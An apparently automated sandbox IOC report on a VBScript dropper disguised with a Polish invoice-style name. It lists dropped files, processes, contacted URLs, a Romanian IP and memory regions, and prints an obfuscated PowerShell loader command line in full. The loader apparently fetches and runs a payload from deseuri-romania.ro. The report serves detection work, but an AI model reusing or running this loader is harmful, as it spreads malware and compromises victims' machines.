IOC Report
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs

loading gif

Files

File Path
Type
Category
Malicious
Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_egclhwgb.myd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huoothud.2hk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwyz3jwf.her.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sy40rhyy.vfi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Ghastily.Kri
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs"
malicious
C:\Windows\System32\PING.EXE
ping Horm5zl_6637.6637.6637.657e
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Hogherd Chimariko Colonizabilities Sternebra #>;$Outdoorsy='Familienavnets';<#Durum Startelementernes Clangorously Substantify Starthullernes #>;$Programmeringssprogets=$Wane+$host.UI; function Tollhouse($Lao){If ($Programmeringssprogets) {$abasements++;}$Vaticinating=$Aaremaalsstillingers48+$Lao.'Length'-$abasements; for( $Nonlinear228=4;$Nonlinear228 -lt $Vaticinating;$Nonlinear228+=5){$Humanlike=$Nonlinear228;$Betting+=$Lao[$Nonlinear228];$Erantissenes='Chefassistenters';}$Betting;}function Profitmagere($Shoetrees){ . ($forstbotanikker) ($Shoetrees);}$Skubbe=Tollhouse 'ForlMAnagoSlngzF reiProsl eeklGodvadjel/Land ';$Gangava=' bef[MiliNCuarE Ddbt ige.GemaSHis,e PharMuldV ielIEvenC Bi,E .ejP adOLikiIDensnreloTSnigmMenyAInfrN S.iaTemegBo reInkarDodo]Mads:Nona: RegsR,tuEranucS nkuFor RUddaiS nhtUnavy K npO.diRDentOMedltSve ORedncStopODe ol Tro Mini=Be,p ';$Skubbe+=Tollhouse 'F,ib5 es.Over0Lukk Pal.(op pW I fiLoxinPe sd arkoMicrwVivisUdes ,onNGallTMoan Tids1Pre.0 Tem.In,e0ll b;Nost In eWstriiSheenCray6pr s4Hel ;Vand Nitwxlini6 Sk 4 Ude; ev gerWennvUkri:Tryk1Taco3Yttr1Cler.klde0Up r)Stor ogiG useOr.ac hokTeguoLuft/ Kl 2Afbi0Opru1,hul0hydr0Giav1Soll0Sign1l.ig Rec FHa.di PolrSlebeBe ifR pooBagaxAf e/Toyl1Euda3 Ta.1.ran.Ko.k0E bl ';$Gangava+='Sole[ProgNWeevEUforTQuin.GoneSElskEDialcIntruAflnRFerrIVelotInteYDe ePPo wrHolko StatLineO SkrCSurpoC,rolddmaTMaliYEurypMonkE pri]Inbu ';$Dendrochronologically=Tollhouse 'BofouBr.eS ForeGrovR egl- HveAResmG An.E ,lunLa nt .nd ';$Galvanism=Tollhouse 'Be,rhVejatConstEs.hpT.rssGrun:Fred/Parm/ p idRekleLithsrubie.nteuAlsirKer iUdsp-Enear DesoOptimBiv.aMelanB goiB,viaTils.,assrBestoTraf/Aro BWambe StonOvern AbniMeten R cgUdnatOveroGro.nPara.Umisj B.lpOverbAfst ';$Play=Tollhouse ' org>Dec, ';$forstbotanikker=Tollhouse ' UnliGenoE locx Gud ';$Relais20='Cruzieros';$Gangava+='Fora: por:UnidTUndilBrugsBril1La i2Rm.u ';$Resurgence='\Ghastily.Kri';Profitmagere (Tollhouse 'Samm$W lfg lenLPustoFluoB h nA KliLVolt:EtheBForea,urvLFa csRepraEv.cMsecteVandRTakeIMadoN ighGI teEPre r PsyNA pee igg=Ano,$ AceEForkNStatvDokt:StatA ommPFathpHabeDNodaAFangTSpina Cen+Afve$pha R unreA.riSPalauStr,r Au.g Us ePat NS.cickogee e e ');Profitmagere (Tollhouse ' Dei$.ilfg A.aL irnoSitabFrenaStemLInte:DeflHOxidobesvRZimmm B ooUranNopgaESgne=Halv$antig Preas eeLLinivUnmeaConsn MeaIBib,SFornmG,og.IntesTr gPstigLVen.I Rustarth(a.ti$skdyP isclRetsaRoseyMini)An e ');Profitmagere (Tollhouse $Gangava);$Galvanism=$Hormone[0];$Flugtet=(Tollhouse 'Tall$RetsGIrrelDeprO pobInteaUnsul Sub:UlopbGen.o BliGPa.aGPu nATidlR Losts ak=fraanPulsE,eltWMo.i- BomoFjedb ankJ F.oEAfkrcV,deTOpgr V.ndsge,nYSa isSno TAutoematrmno t. forn,eacE atatHaem.OutiWAnateDigrb RegcEnoplFi,giCal E St NO erTWund ');Profitmagere ($Flugtet);Profitmagere (Tollhouse ' Po $ ,ubBRuino,pelgS.ydgRh daA tir ieltVauq. MirHAdvieHa vaNa ad obeeIndsr,alssLati[Fled$clywDHarbePorknOphodescarP.onoAcutcRadihBe,nr Re,oForrnHje o roslSi do SprgMopuiR gic Wina Prel bi lInstyunth]bane=crop$MindS,unnkItchuPlasbStrubBaizeDisc ');$Strygejernene=Tollhouse 'Supe$E amB KraoInj gMicagSle aUnasr Kilt.acu.UdebD nto ubiwIn.anEsc lBa vo.istasammdSpaeFGeigiArv l L.meKree( pla$ UstGHol a olylU.lavLydbaNonpnCut.iOve,sFakumPre ,Hypa$UnviH PakjUn ge.iddmAm dlSankn ilgBebysbgerlKgebe.uitr Renn Prie Pro1Kopv1ov r5Bass) int ';$Hjemlngslerne115=$Balsameringerne;Profitmagere (Tollhouse 'Elbe$TilbgForrL TekoAdonbAnimASy dLCram:Afs AB zanRa dtAmbaaStatRKannCfle,hVe.diFiliSInittF ysiHorscSchaANosolOedi=Bala(StyrtHaaneunthSU coT hor-DistPtet,AK beTEksaHRdse xtr$Sebih BorJUnd ENeohMMutil GnaN AfggAtl S La LYahoE HverNeogNco lEHooc1Inte1Sukk5gi b)Dise ');while (!$Antarchistical) {Profitmagere (Tollhouse 'Game$Regeg .onlAfgioS,bhbThyraFortlL ot: nclPRipsrHi liSmrem ropuGeotsEmaneVintrDeut=Fejl$MindtTr erCrumuOkkuefrav ') ;Profitmagere $Strygejernene;Profitmagere (Tollhouse ' FlaSRheutDvnlAHarpRGlagt cli-Cal.S Aa lRigsES vee .auP Pr Subs4 Dam ');Profitmagere (Tollhouse 'gyps$Ku eGGastLSkamOstarb nsaS adl Ver:RammARektNSkalTSucuaApperTwatC omaHKoloi disSDesitSuffITranc ,ndAFredlgrun=R nk(AngiT.izzEtykkSFr mtNaiv- Endp O.eADuppTDok,H.dtr fr.m$Finsh Prej metEWo dm ladLUra nDupogJumbsBrnel ,leEPurvrUnfunTrekeMara1Colo1Cont5Succ)Fred ') ;Profitmagere (Tollhouse 'Ung,$Si,kGRubrL StaoCin B D.cA TefLCom.:E diF ifoHnger OkkN Gery ropeSt pR.omm=d ad$FollgTuneLGat.O X lbPod.aMyrilInco: ratFGrowecommSStritBipls Tida AninOmregpasse ploNMesaE MarsUnen1S,ed9 For1Isoa+Turb+Lain%Teff$OverHFurcoKroprSkr,MF ioO Injn Un eChem.inteCSerio EksUFejlNHysttPush ') ;$Galvanism=$Hormone[$Fornyer];}$Grooverhead=297577;$Quadricycler=30628;Profitmagere (Tollhouse 'Gade$LangGDrosL PlaOTrolbOverABraiL ark:SkrmTR grR Kl iA oycB,edlNud,iVo tN piuI.uenuFlytM Ge inva=Inh. sejtg FraEStriTSko,- AdeC winoBindNCrantS.avEcellN .rst hav Anad$rec,hSk kJ IndeLo,wMAkvalTo dNhom,GTongSDi oL JuvETho.rUncanMondESace1Dagt1Am.e5Gunv ');Profitmagere (Tollhouse 'Saks$OvilgSa ilHeatoRevobCamea AlflRe l:UdkrTS agr AngaDilig ,ruiHolok Cole epr ScyeCa.v Popu= atc ava[PraeSMicryBor,steactfol.eS.anmDat . GenC Eleo rmmnApolvPle eLandrParat Kom]Jule: Bo :PlioF Ther DocoT,anm DukB Bija La,sG nteE ta6 Hol4plafSbesnt Halr iliMetan,aflgU.ps( Cra$UdflTselvrBug,ijag,cfremlProfiKodinHeraiDe.iuFluemPedi)Mu a ');Profitmagere (Tollhouse 'stru$BaleGMel.LAv lOSnedBRecrASla lC al:Ch ipvendEGys R ForV.efjAUn,esRoseI MarOC.unNHai Zoog= ot ka.a[.ppeSUntiygrinsIndeT,erveTe tMPris.Pe lThal.E.yndX ,anTSfa . .areDobbNUnceCdolpO PreDelimI VernSymbg er]Mun : Sin:SognA nivsHalacSpeei VeliSkat.DoveGRetfeParatUndeSTilsT ontR frsIShunNTa dGFlou(Thyr$Atebt TolrBogea Tipg B oi nhykCardEKrigrUretE Ma )I tr ');Profitmagere (Tollhouse 'Slge$ E,iG AftlTek.OFroeB lesARa,ilBank:RewiNM.rieRomiWBanaFTranoEddeUUd mnBlacDTal l BraN uppDP.tuENagerTyraSPre =Svel$ DepPBeareedulrKlapV.ruma UnmS HylITilhO SkanPro.. nrlSAnagu oncb Ps S S rtInfiRDes.IAgn.nMil.g Hyp(Shou$ SvrGR.soR D aOkreoOHengv Pere imer IsohI dhEOctoA GrndMast,Back$Und.QShelUGa,tAPileDPyaeR MadiAntec SteyKongCC ckLChareDentR Ud ).lai ');Profitmagere $Newfoundlnders;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
https://deseuri-romania.ro/Bennington.jpb
188.241.183.203
http://deseuri-romania.ro
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB_q
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://deseuri-romania.ro/Bennington.jpbXR0l
unknown
https://go.micro
unknown
https://deseuri-romania.ro
unknown
https://deseuri-romania.ro/Bennington.jpbP
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 7 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
Horm5zl_6637.6637.6637.657e
unknown
malicious
s-part-0017.t-0009.fb-t-msedge.net
13.107.253.45
deseuri-romania.ro
188.241.183.203

IPs

IP
Domain
Country
Malicious
188.241.183.203
deseuri-romania.ro
Romania

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8380000
direct allocation
page execute and read and write
malicious
569C000
trusted library allocation
page read and write
malicious
2D2E0D12000
trusted library allocation
page read and write
malicious
97DB000
direct allocation
page execute and read and write
malicious
2D2D2A45000
trusted library allocation
page read and write
2D2CF23F000
heap
page read and write
72D0000
trusted library allocation
page read and write
4C7E000
trusted library allocation
page read and write
1F115FE000
stack
page read and write
7FFE7CEC0000
trusted library allocation
page execute and read and write
201E07D5000
heap
page read and write
6E52000
heap
page read and write
6FE9000
heap
page read and write
969000
trusted library allocation
page read and write
6F73000
heap
page read and write
201E0C32000
heap
page read and write
2D2E9436000
heap
page read and write
2D2D2EA8000
trusted library allocation
page read and write
44A0000
heap
page execute and read and write
201DE890000
heap
page read and write
201E0693000
heap
page read and write
201E06A7000
heap
page read and write
71AD000
stack
page read and write
940000
trusted library allocation
page read and write
201E0817000
heap
page read and write
7CC0000
trusted library allocation
page execute and read and write
263F30E0000
heap
page read and write
2D2E94AE000
heap
page read and write
201DE9BE000
heap
page read and write
71C0000
trusted library allocation
page read and write
201E083A000
heap
page read and write
201DE8EE000
heap
page read and write
201E0667000
heap
page read and write
4C23000
trusted library allocation
page read and write
201E0657000
heap
page read and write
201E07EE000
heap
page read and write
2D2D2DB2000
trusted library allocation
page read and write
8DDB000
direct allocation
page execute and read and write
8290000
trusted library allocation
page read and write
201E083A000
heap
page read and write
201E066F000
heap
page read and write
7FFE7CDB0000
trusted library allocation
page read and write
A58000
heap
page read and write
201E070F000
heap
page read and write
201E0817000
heap
page read and write
7E6D000
heap
page read and write
2D2D0BC0000
heap
page read and write
7E69000
heap
page read and write
2D2D0EC6000
trusted library allocation
page read and write
201E07D4000
heap
page read and write
2D2E9257000
heap
page read and write
7FFE7CFC0000
trusted library allocation
page read and write
201E0638000
heap
page read and write
201E06F7000
heap
page read and write
FFB138E000
stack
page read and write
C70000
heap
page read and write
2D2D20FE000
trusted library allocation
page read and write
201E0723000
heap
page read and write
7090000
trusted library allocation
page execute and read and write
4CD9000
trusted library allocation
page read and write
9422C7F000
stack
page read and write
201E0808000
heap
page read and write
70EE000
stack
page read and write
201E064C000
heap
page read and write
439E000
stack
page read and write
7FFE7CFE0000
trusted library allocation
page read and write
201DE9B6000
heap
page read and write
C12000
trusted library allocation
page read and write
FFB093E000
stack
page read and write
FFB04FE000
stack
page read and write
7FFE7CF85000
trusted library allocation
page read and write
2D2CF170000
heap
page read and write
2D2E928E000
heap
page read and write
4B3E000
trusted library allocation
page read and write
2D2CF23D000
heap
page read and write
2D2E9750000
heap
page read and write
201E0674000
heap
page read and write
770000
heap
page read and write
201E0648000
heap
page read and write
7FFE7D110000
trusted library allocation
page read and write
201E0638000
heap
page read and write
201DE9BE000
heap
page read and write
4410000
heap
page read and write
953000
trusted library allocation
page execute and read and write
201E07B1000
heap
page read and write
71D0000
trusted library allocation
page read and write
1F117FC000
stack
page read and write
2D2D164B000
trusted library allocation
page read and write
2D2D11C8000
trusted library allocation
page read and write
6F66000
heap
page read and write
692E000
stack
page read and write
263F31D5000
heap
page read and write
7FFE7CF70000
trusted library allocation
page execute and read and write
7FFE7D060000
trusted library allocation
page read and write
6FAE000
heap
page read and write
4418000
heap
page read and write
FFB148D000
stack
page read and write
2D2E945D000
heap
page read and write
201E0831000
heap
page read and write
2D2D0B30000
trusted library allocation
page read and write
2D2D11C4000
trusted library allocation
page read and write
7E00000
heap
page read and write
82B0000
trusted library allocation
page read and write
B5DB000
direct allocation
page execute and read and write
7CB7000
stack
page read and write
8370000
heap
page read and write
7CE0000
trusted library allocation
page read and write
201E07E2000
heap
page read and write
201E067D000
heap
page read and write
7FFE7CFA0000
trusted library allocation
page read and write
201E0654000
heap
page read and write
8020000
trusted library allocation
page read and write
201E0656000
heap
page read and write
7FFE7D0D0000
trusted library allocation
page read and write
201E0831000
heap
page read and write
2D2D2D8E000
trusted library allocation
page read and write
201DEB40000
heap
page read and write
201DEB48000
heap
page read and write
201E0830000
heap
page read and write
7FFE7D030000
trusted library allocation
page read and write
201DEB4D000
heap
page read and write
7FFE7D050000
trusted library allocation
page read and write
68AE000
stack
page read and write
201E083B000
heap
page read and write
201E06CE000
heap
page read and write
2D2CF1F5000
heap
page read and write
712F000
stack
page read and write
201E06B7000
heap
page read and write
201E07A5000
heap
page read and write
201E0817000
heap
page read and write
201E0808000
heap
page read and write
2D2D19F9000
trusted library allocation
page read and write
2D2D1A20000
trusted library allocation
page read and write
201E06FA000
heap
page read and write
201E0674000
heap
page read and write
7080000
trusted library allocation
page read and write
201DEB48000
heap
page read and write
201E0731000
heap
page read and write
8CA0000
direct allocation
page execute and read and write
201DEB4E000
heap
page read and write
7E57000
heap
page read and write
68EE000
stack
page read and write
7FFE7D0A0000
trusted library allocation
page read and write
980000
heap
page read and write
6F87000
heap
page read and write
201E06DB000
heap
page read and write
201DE948000
heap
page read and write
201E07E8000
heap
page read and write
201DE9BB000
heap
page read and write
FFB07BE000
stack
page read and write
201E07ED000
heap
page read and write
201E0817000
heap
page read and write
8400000
trusted library allocation
page execute and read and write
2D2D2DA5000
trusted library allocation
page read and write
201E07E2000
heap
page read and write
201DE9BE000
heap
page read and write
201E0C28000
heap
page read and write
2D2D21BE000
trusted library allocation
page read and write
7FFE7CF60000
trusted library allocation
page execute and read and write
201E064C000
heap
page read and write
201E07AA000
heap
page read and write
7FFE7D040000
trusted library allocation
page read and write
201DEB4E000
heap
page read and write
201E063B000
heap
page read and write
201E066A000
heap
page read and write
FFB05BF000
stack
page read and write
201E07E5000
heap
page read and write
201DE8EC000
heap
page read and write
201E069B000
heap
page read and write
FFB150B000
stack
page read and write
930000
trusted library section
page read and write
C40000
heap
page readonly
71B0000
trusted library allocation
page read and write
2D2D0D25000
trusted library allocation
page read and write
201E0677000
heap
page read and write
7D30000
trusted library allocation
page read and write
201E066B000
heap
page read and write
71E0000
trusted library allocation
page read and write
7FFE7D0F0000
trusted library allocation
page read and write
FFB0739000
stack
page read and write
2D2D1233000
trusted library allocation
page read and write
201E0643000
heap
page read and write
7EA3000
heap
page read and write
2D2CF350000
heap
page read and write
7FFE7CFF0000
trusted library allocation
page read and write
201DE8C0000
heap
page read and write
5683000
trusted library allocation
page read and write
97A000
trusted library allocation
page execute and read and write
2D2D0BA0000
heap
page execute and read and write
201E065F000
heap
page read and write
2D2E0CB0000
trusted library allocation
page read and write
7FFE7D0C0000
trusted library allocation
page read and write
ABDB000
direct allocation
page execute and read and write
7FFE7CF90000
trusted library allocation
page execute and read and write
2D2E93E9000
heap
page read and write
201DEB4A000
heap
page read and write
2D2CF2B0000
trusted library allocation
page read and write
7DE0000
trusted library allocation
page read and write
7D40000
heap
page read and write
201E07AD000
heap
page read and write
201E0631000
heap
page read and write
8095000
trusted library allocation
page read and write
2D2CF215000
heap
page read and write
7DD0000
trusted library allocation
page read and write
EC0000
trusted library allocation
page execute and read and write
2D2CF2A3000
heap
page read and write
2D2E8CA0000
heap
page read and write
7FFE7CDFC000
trusted library allocation
page execute and read and write
7050000
trusted library allocation
page read and write
201E0808000
heap
page read and write
2D2D2DC8000
trusted library allocation
page read and write
201E0C38000
heap
page read and write
2D2E0FAB000
trusted library allocation
page read and write
201E06D3000
heap
page read and write
445E000
stack
page read and write
67D000
stack
page read and write
7FFE7D100000
trusted library allocation
page read and write
678000
stack
page read and write
2D2E0CA1000
trusted library allocation
page read and write
201E07CF000
heap
page read and write
201E067A000
heap
page read and write
A24000
heap
page read and write
6FEF000
heap
page read and write
201E07A5000
heap
page read and write
2D2D1A2C000
trusted library allocation
page read and write
7FFE7D120000
trusted library allocation
page read and write
5519000
trusted library allocation
page read and write
201E07C0000
heap
page read and write
201E07B6000
heap
page read and write
201E07F6000
heap
page read and write
7E75000
heap
page read and write
201E06BF000
heap
page read and write
7FFE7CE50000
trusted library allocation
page read and write
201E068E000
heap
page read and write
201E0808000
heap
page read and write
201E067F000
heap
page read and write
2D2D14F1000
trusted library allocation
page read and write
4B40000
trusted library allocation
page read and write
7FFE7D140000
trusted library allocation
page execute and read and write
81F0000
heap
page read and write
201E0656000
heap
page read and write
2D2E94AA000
heap
page read and write
201E0638000
heap
page read and write
201E064B000
heap
page read and write
7FFE7CF87000
trusted library allocation
page read and write
2D2D2D92000
trusted library allocation
page read and write
201E0682000
heap
page read and write
7FFE7D000000
trusted library allocation
page read and write
6BC0000
heap
page read and write
201DE8EE000
heap
page read and write
7F5E0000
trusted library allocation
page execute and read and write
900000
heap
page read and write
201E0706000
heap
page read and write
7FFE7CFB0000
trusted library allocation
page read and write
201E0C2D000
heap
page read and write
2D2E91C7000
heap
page execute and read and write
1F112FE000
stack
page read and write
201DE9B6000
heap
page read and write
63C000
stack
page read and write
201E083C000
heap
page read and write
960000
